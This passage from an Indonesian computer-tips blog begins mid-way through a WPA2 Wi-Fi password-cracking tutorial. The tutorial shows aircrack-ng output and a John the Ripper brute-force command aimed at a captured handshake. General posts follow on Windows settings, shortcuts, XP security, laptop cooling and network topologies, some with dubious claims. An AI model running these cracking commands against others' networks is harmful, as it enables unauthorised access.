Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:00] 48 keys tested (489.60 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu: W!R3L3$$PWD

7. Jika anda tidak mau memakai, wordlist biasanya menunggu agak lama, apalagi jika komputernya lemot. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w
-/tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:22] 11484 keys tested (534.50 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B root@binushacker:~#

Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD 
source:Binushacker.net

Cara Sembunyikan Regedit dan Control Panel

Tips dan trik komputerku | Cara Sembunyikan Regedit dan Control Panel - Tips Komputer kali ini akan membahas cara menyembunyikan Regedit dan Control Panel untuk mencegah perubahan system apabila komputer dipakai oleh banyak user. Sebelum mengikuti Tips Komputer yang satu ini, ada baiknnya kita mengetahui dulu definisi Regedit dan Control Panel.

Regedit adalah sebuah system yang digunakan untuk mengedit sistem registrasi, dimana anda dapat mengaktifkan atau menonaktifkan layanan dari system, seperti menonaktifkan sistem service atau startup dll.

Control Panel adalah bagian dari Microsoft graphical user interface (GUI) yang memungkinkan pengguna untuk melihat dan memanipulasi pengaturan sistem dasar dan kontrol melalui applet , seperti menambahkan hardware , menambahkan dan menghapus perangkat lunak (Software), pengenadalian account pengguna, dan mengubah aksebilitas pilihan.

Cara menyembunyikan control panel dan regedit ini biasannya saya temukan pada warnet", dan tempat umum lainnya agar system jaringan komputer mereka tidak mudah dirusak oleh user untuk kepentingan pribadinnya. Untuk lebih meningkatkan dan mencegah dirusaknya system keamanan komputer umumnnya juga dapat digunakan dengan menggunakan software Deep Freeze.tapi cara yang saya share tanpa menggunakan software deep freeze.

Untuk  Cara Sembunyikan Regedit dan Control Panel silakan ikuti tips dibawah ini:

Menyembunyikan Regedit:

  • Klik start - run - gpedit.msc - tekan enter.
  • Selanjutnya pilih User Configuration - Administrative templates - System.
  • Klik 2x pilihan Prevent acces to registry editing tools.
  • Pilih enable - next, OK
Menyembunyikan Control Panel:

Ada 2 cara menyembunyikan control panel, anda boleh memilih salah satu cara.

Cara 1:
  • Klik start - run - gpedit.msc - tekan enter.
  • Selanjutnya pilih User Configuration - Administrative templates - Control Panel.
  • Klik 2x Prohibit Access to the Control Panel.
  • Pilih enable, OK
Cara 2:
  • Jalankan Registry Editor dengan mengklik [Start]>[Run] lalu ketikan “regedit” dan tekan [Enter].
  • Masuklah ke HKEY_CURRENT_USER\Software\Microsof\Windows\CurrentVersion\Explorer\Advance.
  • Buatlah sebuag Dword value baru. Caranya klik kanan, lalu pilih [New]>[Dword Value]. Beri nama “Start_ShowControlPanel”.
  • Klik dua kali pada value yang baru saja dibuat dan isi nilainya dengan angka 0.
  • Tutup Registry Editor dan restart PC, maka menu Control Panel akan hilang.

Monday 12 May 2014

Booting BackTrack 5 R3 Pada VGA Intel

Tips dan trik komputerku | kali ini saya akan embuat artikel tentang linux.yaitu Cara Mengatasi Masalah VGA Pada Backtrack 5 R3 | Install Backtrack 5 R3 di vga intel.
Ketika Backtrack 5 dirilis, isu yang paling umum adalah BlackScreen ketika menggunakan perintah startx untuk memulai modus GUI. Ini masalah umum menyebabkan VGA pada mesin tertentu tidak mendukung. Ini masalah BlackScreen masih ditemukan pada Backtrack 5 R1 dan Backtrack 5 R2 bahkan pada Backtrack 5 R3.Ketika saya menginstallnya pada komputer saya, kebetulan saya menggunakan VGA Card ATI RADEON awalnya sih lancar-lancar saja tapi setelah saya buka VGA tersebut untuk menggunakan VGA Onboardnya masalah pun mucul. Saya cari kesana-kemari ternyata bukan cuma saya yang mengalami hal demikian. Sebagian besar mempunyai masalah yang sama da setelah saya coba alhasil sempurna. Tetapi tidak semua VGA Intel seperti itu, di laptop saya VGAnya Intel HD Graphics 300 toh lancar-lancar aja.

Untuk lebih jelasnya mari ikuti langkah-langkah berikut :
  1. Booting melalui CD / Flashdisk
  2. Jangan langsung tekan ENTER, tekan TAB lalu tuliskan seperti tulisan dibawah :
    "i915.modeset = 1" setelah tulisan "text = vga 791"
    kalo kurang jelas, lihat gambar berikut :
    Cara Mengatasi Masalah VGA Pada Backtrack 5 R3
 Semoga Bermanfaat.^_^

Fungsi Tombol Keyboard Shortcut/Kombinasi Ctrl + A-Z Lengkap

Fungsi Tombol Keyboard Shortcut/Kombinasi Ctrl + A-Z Lengkap
Tombol Ctrl sangat besar sekali peranannya dalam dunia komputer. Fungsi utamanya adalah untuk mempercepat kegiatan kita di depan layar monitor. Tombol Ctrl di keyboard tidak akan berfungsi jika  tidak ditekan bersama-sama dengan tombol lain.

Berikut ini fungsi tombol shortcut/kombinasi ctrl + (a-z) yang kami sajikan secara lengkap. Kombinasi tombol ctrl + (a-z) ini bisa berfungsi ketika kita menggunakan office, browsing, maupun menggunakan aplikasi/software lainnya.

Microsoft Office

Ctrl+A: Blok semua data dalam dokumen
Ctrl+B: Menebalkan huruf (Bold)
Ctrl+C: Menggandakan/Mengkopi data (Copy)
Ctrl+D: Membuka format huruf
Ctrl+E: Membuat teks rata tengah (Center)
Ctrl+F: Mencari data (Find)
Ctrl+G: Mencari halaman
Ctrl+H: Mengganti nama data (Replace)
Ctrl+I: Memiringkan huruf (Italic)
Ctrl+J: Tulisan rata kiri kanan (Justify)
Ctrl+K: Menyisipkan Hyperlink
Ctrl+L: Rata kiri (Align Left)
Ctrl+M: Sama dengan 'tabulasi'(tambah indent)
Ctrl+N: Membuat lembar dokumen baru
Ctrl+O: Membuka dokumen
Ctrl+P: Mencetak tulisan (Print)
Ctrl+Q: Mengatur tabulasi (remove indent/kebalikan Ctrl+M)
Ctrl+R: Tulisan rata kanan (Align Right)
Ctrl+S: Menyimpan data
Ctrl+T: Tabulasi
Ctrl+U: Garis bawah (Underline)
Ctrl+V: Menggandakan data untuk kedua kali (Paste)
Ctrl+W: Menutup data
Ctrl+X: Memotong data (Cut)
Ctrl+Y: Redo (Kebalikan dari Ctrl+Z)
Ctrl+Z: Undo (Membatalkan perintah sebelumnya)

Microsoft Open Office

Ctrl+A: Blok semua data dalam dokumen
Ctrl+B: Menebalkan huruf (Bold)
Ctrl+C: Menggandakan/Mengkopi data (Copy)
Ctrl+D: Garis bawah dobel (lebih tebal) (Underline Special)
Ctrl+E: Membuat teks rata tengah (Center)
Ctrl+F: Mencari data (Find)
Ctrl+G: tabulasi
Ctrl+H: N/A
Ctrl+I: Memiringkan huruf (Italic)
Ctrl+J: Tulisan rata kiri kanan (Justify)
Ctrl+K: Menyisipkan Hyperlink
Ctrl+L: Rata kiri (Align Left)
Ctrl+M: N/A
Ctrl+N: Membuat lembar dokumen baru
Ctrl+O: Membuka dokumen
Ctrl+P: Mencetak tulisan (Print)
Ctrl+Q: Close aplikasi (Quit)
Ctrl+R: Tulisan rata kanan (Align Right)
Ctrl+S: Menyimpan data
Ctrl+T: N/A
Ctrl+U: Garis bawah (Underline)
Ctrl+V: Menggandakan data untuk kedua kali (Paste)
Ctrl+W: Menutup data
Ctrl+X: Memotong data (Cut)
Ctrl+Y: Redo (Kebalikan dari Ctrl+Z)
Ctrl+Z: Undo (Membatalkan perintah sebelumnya)

Browser

Ctrl+(1-9): Ke tab Nomor....
Ctrl+A: Blok semua data dalam dokumen
Ctrl+B: N/A, bookmark sidebar firefox
Ctrl+C: Copy
Ctrl+D: Bookmark halaman
Ctrl+E: N/A, mencari cepat di chrome
Ctrl+F: Mencari data
Ctrl+G: Mencari (mungkin sama dengan Ctrl+F?)
Ctrl+H: History
Ctrl+I: N/A, sidebar bookmark firefox
Ctrl+J: Kotak download
Ctrl+K: Mencari cepat
Ctrl+L: Memasukkan alamat web pada browser
Ctrl+M: N/A, Email pada opera
Ctrl+N: Jendela baru (New window)
Ctrl+O: Membuka document (Open)
Ctrl+P: Mencetak halaman (Print)
Ctrl+Q: N/A
Ctrl+R: Reload/Refresh halaman (muat ulang halaman)
Ctrl+S: Menyimpan document (Save)
Ctrl+T: Membuka tab baru pada browser
Ctrl+U: Page Source ( melihat script web)
Ctrl+V: Fungsinya untuk menempelkan kata yang sudah di copy (Paste)
Ctrl+W: Fungsinya untuk mengclosekan tab yang ada dibrowser
Ctrl+X: Fungsinya untuk memindahkan kata (Cut)
Ctrl+Y: Fungsinya untuk mengembalikan apa yang sudah di Undo (Redo)
Ctrl+Z: Fungsinya untuk mengembalikan ke keadaan seperti sebelumnya. (Undo)

Tips Jika Masih Menggunakan Windows XP

Tips Jika Masih Menggunakan Windows XP

Saat ini Masa support Windows XP sudah habis pada 8 April 2014. Setelah masa tersebut maka tidak akan ada lagi patch, bug fix, dan update yang dirilis untuk XP. Hal ini tentu saja menjadi surga bagi para attacker/hacker, apalagi hingga saat ini Windows XP masih digunakan oleh hampir 30 persen pengguna komputer di dunia.

Solusi terbaik memang sebaiknya kamu beralih ke versi Windows yang lebih baru. Tetapi karena beberapa hal, tidak semua orang bisa beralih dari Windows XP. Mungkin karena pertimbangan biaya, batasan spesifikasi komputer, atau masih tergantung dengan software yang hanya berjalan di Windows XP saja.

Jika kamu adalah orang yang belum bisa beralih dari Windows XP, berikut ini beberapa tips yang bisa menjaga PC kamu tetap aman pasca habisnya masa support Windows XP nanti.

Tips Jika Masih Menggunakan Windows XP


1. Selektif Dalam Memilih Software
Meskipun masa support OS kamu sudah habis, pastikan kamu memilih software yang masih memberikan support dan update untuk Windows XP. Misalnya saja untuk browser jangan gunakan Internet Explorer karena Microsoft tidak akan lagi merilis patch dan update. Gunakan saja browser seperti Chrome atau Firefox yang masih tetap memberikan support hingga beberapa tahun kedepan.

Gunakan juga antivirus yang masih support Windows XP dan tetap berkomitmen untuk memberikan update. Beruntung mayoritas antivirus masih akan tetap mensupport Windows XP, ada yang berkomitmen untuk terus memberi support hingga 2015, bahkan ada yang sampai 2016. Salah satu antivirus seperti Avast Antivirus, bakal tetap mensupport Windows XP hingga setidaknya 2 tahun kedepan.

Untuk email client jangan lagi menggunakan Outlook Express yang dipastikan tidak akan diupdate lagi. Gunakan saja Thunderbird misalnya, yang tetap bakal diberikan update oleh Mozilla hingga waktu yang belum ditentukan. Hindari juga menggunakan Office 2003 atau Office XP, karena support Office tersebut bakal habis juga pada 8 April 2014.

2. Uninstall Software Yang Tidak Dibutuhkan
Setiap software yang tidak terupdate kini bisa menjadi celah keamanan. Untuk itu pastikan kamu uninstall software-software yang sudah tidak dibutuhkan, khususnya software yang sudah tidak pernah diupdate lagi. Sisakan software yang memang sering kamu gunakan dan menjadi kebutuhan utama kamu dalam berkomputer.

3. Pastikan Software Tetap Uptodate
Meskipun support Windows XP sudah dihentikan, tetapi pastikan software yang digunakan tetap up to date. Menjaga software tetap up to date akan membuat celah serangan dan eksploit semakin kecil.

4. Gunakan Akun Selain Akun Administrator
Eksploit dan infeksi biasanya akan menyebar dengan parah jika yang terinfeksi adalah akun administrator. Privilege admin memungkinkan attacker untuk mengubah dan mengendalikan PC kamu secara penuh. Untuk itu agar PC kamu lebih aman, kamu bisa menggunakan akun selain admin untuk kegiatan sehari-hari. Hanya gunakan akun admin jika diperlukan saja, misalnya untuk install software dan sebagainya. Untuk kegiatan yang tidak membutuhkan privileges admin, gunakan saja akun biasa.

5. Hilangkan Privilege Admin
Di akun yang digunakan untuk bekerja, sebaiknya menggunakan akun standar yang tidak memiliki privilege sebagai administrator. Gunakan akun yang memiliki privilege admin hanya untuk menginstall software dan aplikasi saja, selebihnya untuk beraktivitas gunakan akun standar.

6. Gunakan Secara Offline
Jika kamu memang tidak membutuhkan internet, misalnya saja komputer XP yang digunakan untuk menjalankan aplikasi perkantoran, maka sebaiknya putuskan saja koneksi internet di PC kamu tersebut. Dengan tidak terhubungnya PC ke internet, maka itu sudah mengurangi mayoritas resiko eksploit di Windows XP.

7. Batasi Konektivitas Network Seminimal Mungkin
Melindungi Windows XP akan jauh lebih mudah jika sistem lain tidak terhubung dengannya. Konektivitas network (termasuk internet) merupakan salah satu sumber dari serangan maupun eksploit, dan membatasi konektivitas tersebut seminimal mungkin sesuai kebutuhan akan membuat Windows XP menjadi lebih aman dan terisolasi.

8. Gunakan Intrusion Prevention System
Intrusion prevention systems (IPS) atau yang disebut juga Intrusion detection and prevention systems (IDPS) adalah sistem keamanan network yang akan memonitor aktivitas di sebuah network dan mengamankannya dari aktivitas-aktivitas yang mencurigakan. Jika IPS mendeteksi adanya aktivitas yang mencurigakan, misalnya saja upaya seseorang untuk menjalankan code tertentu secara remote, maka IPS akan memblokir aktivitas tersebut dan menuliskan reportnya.

Penggunaan IPS ini sangat disarankan di setiap perusahaan untuk mengamankan jaringan sistem, apalagi jika Windows XP menjadi mayoritas OS yang digunakan di perusahaan tersebut. Pastikan juga vendor IPS yang digunakan tetap up to date dengan jenis-jenis serangan baru di Windows XP.

9. Jalankan XP Pada Virtual Machine
Jika pertimbangan kamu untuk tidak bisa beralih dari XP adalah karena masih tergantung dengan software yang hanya bisa berjalan di XP, Disarankan kamu untuk menjalankan XP di virtual machine. Kamu bisa menggunakan Windows 7 atau Windows 8 sebagai sistem operasi host, dan menginstall Windows XP di virtual machine untuk menjalankan software yang kamu butuhkan. Sebagai contoh dapat menggunakan VMWare yang bisa digunakan secara gratis.

Windows 7 Pro bahkan sudah dilengkapi dengan XP Mode yang bisa digunakan untuk menjalankan Windows XP di virtual machine tanpa harus membeli lisensi XP lagi.

10. Ikuti Perkembangan Windows XP
Meskipun Microsoft sudah tidak lagi merilis informasi security dan celah keamanan Windows XP, tetapi kamu bisa terus mengikuti berbagai info dan obrolan di komunitas security pihak ketiga. Komunitas dan firma security pihak ketiga kemungkinan besar akan tetap tertarik untuk meneliti berbagai celah keamanan di Windows XP serta menawarkan berbagai solusi.

11. Lakukan Analisa Untung/Rugi
Berbagai langkah untuk menjaga security Windows XP diatas pastinya membutuhkan biaya dan upaya ekstra. Untuk itu sebaiknya kamu mulai melakukan analisa untung/rugi untuk memperhitungkan apakah tetap bertahan menggunakan Windows XP adalah pilihan yang tepat. Jika memang hal itu dianggap tidak efektif baik secara produktivitas maupun finansial, maka sebaiknya kamu mengambil langkah tepat dengan melakukan upgrade.

12. Migrasi Ke OS Lain
Jika pertimbangan kamu tidak bisa beralih dari XP adalah karena spesifikasi hardware yang tidak mumpuni untuk melakukan upgrade, kamu bisa beralih ke OS lain yang lebih aman tetapi tetap ringan. Saran, kamu bisa bermigrasi ke Linux Ubuntu jika spesifikasi PC kamu tidak mampu untuk upgrade ke Windows 7 atau Windows 8.

Cara Mengatasi Laptop Yang Cepat Panas

Kali ini saya akan memberikan Tips Trik Cara Mengatasi Panas Pada Laptop/Cara Mencegah Agar Laptop Tidak Cepat Panas .Ada banyak faktor yang mengakibatkan laptop mudah panas, diantaranya sering digunakan untuk bermain game dan terlalu sering digunakan untuk internetan. Ketika laptop digunakan untuk bermain game atau internetan maka kinerja hardware akan lebih tinggi. Laptop yang sering panas tentu saja akan mengakibatkan menurunnya performa laptop itu sendiri sehingga berakibat pada umur perangkat tersebut.

Cara Mencegah Agar Laptop Tidak Cepat Panas

Untuk mengatasi laptop yang mudah panas maka ada baiknya jika anda menggunakan perangkat tersebut dengan tata cara yang benar. Anda bisa menerapkan cara mengatasi panas pada laptop dibawah ini :

1. Gunakan Collling Pad
Cara ini paling banyak digunakan dan bukan rahasia lagi, tetapi pengaruh cooling pad sangat kurang dalam menurunkan suhu, cooling pad yang hanya mampu menurunkan temperatur atau suhu sekitar 1 - 5 C.

2. Membersihkan Heatsink/Kipas Laptop
Banyak penyebab yang menjadikan kipas tersebut bekerja sangat lambat mungkin debu atau yang lainnya. luangkanlah waktu untuk membersihkannya dan memberinya pelumas dalam jangka waktu 2 minggu sekali atau 3 minggu sekali.

3. Ganti Thermal Paste CPU
Thermal paste sendiri berfungsi sebagai penghantar panas pada GPU dan prosesor. Apabila Thermal paste sudah mengeras maka kewajiban Anda untuk segera menggantinya dengan yang baru.

4. Suhu Ruangan
Sebaiknya apabila menggunakan laptop diruang yang terbuka atau diruangan AC. Jangan mengoperasikan diruang yang tertutup karena dapat menganggu sirkulasi udara perangkat.

5. Pemilihan Tempat
Jangan mengoperasikan laptop di tempat yang empuk seperti diatas kasur, pangkuan, sofa karena hal tersebut menyebabkan panas yang dihasilkan oleh processor sulit diminimallkan karena sirkulasi udara tidak dapat keluar dengan lancar. Usahakan letakkan laptop di tempat yang mudah menyerap panas.

6. Gunakan Sewajarnya
Pemakaian wajar sebuah laptop ± 1-2,5 jam saja. Jangan pernah mengoperasikan laptop dalam keadaan baterai sedang diisi apa lagi kalau si laptop di jalankan tanpa menggunakan baterai. Karena baterai dapat mengatur tenaga yang dibutuhkan laptop itu sendiri apabila digunakan langsung terhubung dengan listrik maka tidak ada pengontrolan energi yang seharusnya digunakan laptop sehingga dapat merusak komponen-komponen didalamnya. (Baca : Tips Cara Merawat Baterai Laptop Agar Awet dan Tahan Lama)

7. Undervolting
Undervolting adalah proses mengurangi voltase berlebih ke CPU dengan menggunakan software. Undervolting tidak mempengaruhi performance sama skali. yang mempengaruhi performance adalah overclock dan underclock. Undervolting berusaha untuk mengatur voltase agar stabil.

Proses undervolting memang memakan waktu, karena kita harus mencari voltase stabil terendah untuk tiap2 multiplier di CPU. Multiplier berhubungan dengan teknologi speedstep, daripada CPU bekerja full power tiap saat, multiplier digunakan untuk mengatur clock cpu secara dinamik (tanda multiplier: 6x, 7x, 8x dst).

Sunday 4 May 2014

Cara Download Video di Youtube Dengan Mozilla Firefox

Sebagian besar orang pasti sering menonton video dari youtube dan yang jadi permasalahanya orang" tersebut ingin video yang di tontonya ingin menjadi koleksinya. dan mereka tidak tahu bagaimana cara mendownloadnya. dan tidak banyak juga orang yg mengetahuinya cara mendownload di youtube yaitu dengan menggunakan software Internet Download Manager. Tapi Sebagian dari kita mungkin sering mengalami kesulitan dalam mendownload video di youtube, tapi dengan cara ini maka kita dengan mudah mendownload video di youtube hanya dengan menggunakan Mozilla Firefox.

Cara Download Video Youtube Dengan Mozilla Firefox


1. Buka Mozilla Firefox. Kemudian masuk ke menu atau tekan ctrl+shift+a  Plugin/Add-ons dan ketikkan 1-Click YouTube Video Download pada kotak pencari.

Cara Download Video di Youtube Dengan Mozilla Firefox

2. Setelah itu install/pasang plugin 1-Click YouTube Video Download dan tunggu hingga prosess instalasi selesai.

Cara Download Video di Youtube Dengan Mozilla Firefox

3. Jika pemasangan sudah selesai, sekarang anda bisa mendownload video di youtube hanya dengan menggunakan Mozila Firefox. Sebagai contoh jika anda ingin mendownload video di youtube, akan ada tombol download di bawah video. Bila anda ingin mendownload klik tombol tersebut dan pilih extention file (3GP, MP4, FLY, DLL).

Cara Download Video di Youtube Dengan Mozilla Firefox
Kalo dalam video youtube tersebut belum keluar tombol download, maka sebaiknya anda restart atau refresh browser mozilla nya tekan aja f5, agar add on bisa aktif dengan sempurna.

Pengertian dan Jenis - Jenis Topologi Jaringan

Tips dan trik komputerku -Topologi jaringan adalah suatu aturan atau cara untuk menghubungkan komputer yang satu dengan komputer yang lainnya sehingga membentuk suatu jaringan. Topologi jaringan juga dapat didefinisikan sebagai gambaran secara fisik dari pola hubungan antara komponen jaringan, yang meliputi Server, Workstation, Hub, dan pengkabelannya.

1. Topologi BUS


topologi star

Pada topologi Bus semua komputer dihubungkan secara langsung pada media transmisi dengan konfigurasi yang disebut Bus. Kebel untuk menghubungkan jaringan ini biasanya menggunakan kebel Coaxial. Setiap Server dan Workstation yang disambungkan pada Bus menggunakan konektor T (T-Connector). Pada kedua ujung kabel harus diberi Terminator berupa Resistor yang memiliki resistansi khusus sebesar 50 Ohm yang berwujud sebuah konektor, bila resistansi dibawah maupun diatas 50 Ohm, maka Server tidak akan bisa bekerja secara maksimal dalam melayani jaringan, sehingga akses User atau Client menjadi menurun. Sekarang ini, topologi bus sering digunakan backbone (jalur utama), dengan menggunakan kabel Fiber Optik sebagai media transmisi.

Keunggulan topologi Bus:
  1. Penggunaan kabel sedikit, sehingga terlihat sederhana dan hemat biaya.
  2. Pengembangan menjadi mudah.

Kelemahan topologi Bus:
  1. Jaringan akan terganggu bila salah satu komputer rusak.
  2. Jika tingkat traffic tinggi dapat menyebabkan kemacetan.
  3. Membutuhkan Repeater untuk jarak jaringan yang terlalu jauh (jika menggunakan kabel coaxial).
  4. Bila terjadi gangguan yang terlalu serius, maka proses pengiriman data menjadi lambat karena lalu lintas jaringan penuh dan padat akibat tidak ada pengontrol User.
  5. Deteksi kesalahan sangat kecil, sehingga bila terjadi gangguan maka sulit sekali mencari kesalahan tersebut.
2. Topologi Star


topologi star


Pada Topologi jaringan Star, setiap Workstation dihubungkan dengan menggunakan alat penghubung terpusat atau yang disebut dengan konsentrator. Masing – masing Workstation tidak saling berhubungan. Jadi setiap Workstation yang terhubung ke konsentrator tidak akan dapat berinteraksi atau berkomunikasi sebelum konsentrator dihidupkan. Bila Konsentrator dimatikan, maka seluruh koneksi jaringan akan terputus. Bila dibandingkan dengan sistem topologi jaringan Bus, sistem ini mempunyai tingkat kerumitan jaringan yang lebih sederhana, hanya saja pada sistem ini membutuhkan konsentrator.

Pada topologi ini beban yang dipikul oleh konsentrator cukup berat, dengan demikian tingkat kerusakan atau gangguan dari sentral ini lebih besar. Hubungan antar Workstation akan dilakukan melalui peralatan yang disebut konsentrator, sehingga setiap Workstation dihubungkan dengan kabel jaringan ke konsentrator. Jadi, tidak ada hubungan kabel antar Workstation. Pada topologi Star, penambahan Workstation tidak akan mengganggu sistem yang sedang bekerja, tinggal menambah kabel dari Workstation ke konsentrator. Begitu pula jika salah satu Workstation kabelnya terputus atau terjadi kerusakan, maka tidak akan mengganggu Workstation lain yang sedang bekerja. Yang bertindak sebagai konsentrator dalah Hub dan Switch.

Keunggulan topologi Star:

  1. Fleksibel dalam hal pemasangan jaringan baru, tanpa mempengaruhi jaringan yang sudah ada sebelumnya.
  2. Bila salah satu kabel koneksi User putus, maka hanya komputer  User yang bersangkutan saja yang tidak berfungsi dan tidak mempengaruhi User yang lain (keseluruhan hubungan jaringan masih tetap bekerja).

Kelemahan topologi Star:
  1. Boros dalam pemakaian kabel, jika dihubungkan dengan jaringan yang lebih besar dan luas.
  2. Bila pengiriman data secara bersamaan waktunya, dapat terjadi Collision.
3. Topologi Ring


Topologi Ring


Untuk membentuk jaringan cincin, setiap sentral harus dihubungkan seri satu dengan yang lain dan hubungan ini akan membentuk Loop tertutup. Dalam sistem ini setiap sentral harus dirancang agar dapat berinteraksi dengan sentral yang berdekatan maupun berjauhan. Dengan demikian topologi ini memiliki kemampuan melakukan Switching ke berbagai arah Workstation. Keuntungan dari topologi jaringan ini antara lain adalah tingkat kerumitan jaringan rendah (sederhana). Topologi ini sering digunakan untuk jaringan yang luas pada satu kota dengan menggunakan media transmisi kabel fiber optik, misalnya untuk menghubungkan beberapa ISP pusat dan cabang dalam satu kota.

Keunggulan topologi Ring:

  1. Hemat kabel.
  2. Untuk membangun jaringan dengan topologi ini lebih murah bila dibandingkan dengan topologi Star.

Kelemahan topologi Ring:
  1. Sangat peka terhadap kesalahan jaringan.
  2. Sukar untuk mengembangkan jaringan, sehingga jaringan tersebut nampak menjadi kaku.
  3. Biaya pemasangan lebih besar.
 4. Topologi Tree


topologi tree



Topologi Tree atau juga disebut sebagai topologi jaringan bertingkat. Topologi ini biasanya digunakan untuk interkoneksi antar sentral dengan susunan yang berbeda. Topologi Tree merupakan pengembangan dari topologi Star. Pada topologi Tree setiap tingkai atau Node akan dihubungakan pada pusat atau konsentrator (Hub atau Switch) yang berada pada awal Trafic rangkaian.

Pada dasarnya, topologi Tree merupakan gabungan dari beberapa topologi Star, sehingga keunggulan dan kelemahan dalam topologi ini hampir sama dengan topologi Star.

Keunggulan topologi Tree:
  1. Mudah dalam pengembangan jaringan.
  2. Mudah dalam mendeteksi kerusakan.
  3. Jika salah satu kabel sub-Node, maka sub-Node yang lain tidak akan terganggu.

Kelemahan topologi Tree:
  1. Jika salah satu konsentrator atau sentral Node mengalami kerusakan, maka sub-Node yang ada dibawahnya akan terganggu.
5. Topologi Mesh



Pengertian Topologi Mesh



Topologi Mesh merupakan topologi yang dibangun dengan memasang Link diantara semua Node. Topologi jaringan ini menerapkan hubungan antar sentral secara penuh atau Fully-Connected Mesh, yaitu sebuah jaringan dimana setiap Node terhubung langsung ke semua Node yang lain. Jumlah saluran atau Link yang harus disediakan untuk membentuk jaringan topologi Mesh adalah jumlah Node (Station) dikurang 1 (n-1, n = Jumlah Node). Misal, jika semua Node dalam jaringan terdapat 5 Node, maka setiap Node harus me-Link (menyambung) ke 4 Node lainnya.

Topologi Mesh biasanya digunakan pada ISP (Internet Service Provider) untuk memastikan bila terjadi kerusakan pada salah satu sistem komputer maka tidak akan mengganggu hubungan jaringan dengan sistem komputer lain dalam jaringan.

Keunggulan topologi Mesh:
  1. Topologi Mesh memiliki tingkat Redundancy yang tinggi, sehingga jika terdapat satu Link yang rusak maka suatu Node (Station) dapat mencari Link yang lainnya.

Kelemahan topologi Mesh:
  1. Membutuhkan biaya yang cukup besar, karena membutuhkan banyak kabel, setiap Node harus dipasang LAN Card sebanyak n-1 (n=Jumlah Node).
  2. Jaringan ini tidak praktis.

Pengertian Topologi Mesh Serta Kelebihan dan Kekuranganya




Topologi jaringan adalah suatu aturan atau cara untuk menghubungkan komputer yang satu dengan komputer yang lainnya sehingga membentuk suatu jaringan. Topologi jaringan juga dapat didefinisikan sebagai gambaran secara fisik dari pola hubungan antara komponen jaringan, yang meliputi Server, Workstation, Hub, dan pengkabelannya.
 
5. Topologi Mesh



Pengertian Topologi Mesh



Topologi Mesh merupakan topologi yang dibangun dengan memasang Link diantara semua Node. Topologi jaringan ini menerapkan hubungan antar sentral secara penuh atau Fully-Connected Mesh, yaitu sebuah jaringan dimana setiap Node terhubung langsung ke semua Node yang lain. Jumlah saluran atau Link yang harus disediakan untuk membentuk jaringan topologi Mesh adalah jumlah Node (Station) dikurang 1 (n-1, n = Jumlah Node). Misal, jika semua Node dalam jaringan terdapat 5 Node, maka setiap Node harus me-Link (menyambung) ke 4 Node lainnya.

Topologi Mesh biasanya digunakan pada ISP (Internet Service Provider) untuk memastikan bila terjadi kerusakan pada salah satu sistem komputer maka tidak akan mengganggu hubungan jaringan dengan sistem komputer lain dalam jaringan.

Keunggulan topologi Mesh:
  1. Topologi Mesh memiliki tingkat Redundancy yang tinggi, sehingga jika terdapat satu Link yang rusak maka suatu Node (Station) dapat mencari Link yang lainnya.

Kelemahan topologi Mesh:
  1. Membutuhkan biaya yang cukup besar, karena membutuhkan banyak kabel, setiap Node harus dipasang LAN Card sebanyak n-1 (n=Jumlah Node).
  2. Jaringan ini tidak praktis.

Pengertian Topologi Tree Serta Kelebihan dan Kekuranganya

Topologi jaringan adalah suatu aturan atau cara untuk menghubungkan komputer yang satu dengan komputer yang lainnya sehingga membentuk suatu jaringan. Topologi jaringan juga dapat didefinisikan sebagai gambaran secara fisik dari pola hubungan antara komponen jaringan, yang meliputi Server, Workstation, Hub, dan pengkabelannya

4. Topologi Tree



topologi tree



Topologi Tree atau juga disebut sebagai topologi jaringan bertingkat. Topologi ini biasanya digunakan untuk interkoneksi antar sentral dengan susunan yang berbeda. Topologi Tree merupakan pengembangan dari topologi Star. Pada topologi Tree setiap tingkai atau Node akan dihubungakan pada pusat atau konsentrator (Hub atau Switch) yang berada pada awal Trafic rangkaian.

Pada dasarnya, topologi Tree merupakan gabungan dari beberapa topologi Star, sehingga keunggulan dan kelemahan dalam topologi ini hampir sama dengan topologi Star.

Keunggulan topologi Tree:
  1. Mudah dalam pengembangan jaringan.
  2. Mudah dalam mendeteksi kerusakan.
  3. Jika salah satu kabel sub-Node, maka sub-Node yang lain tidak akan terganggu.

Kelemahan topologi Tree:
  1. Jika salah satu konsentrator atau sentral Node mengalami kerusakan, maka sub-Node yang ada dibawahnya akan terganggu.

Pengertian Topologi Ring Serta Kelebihan dan Kekuranganya

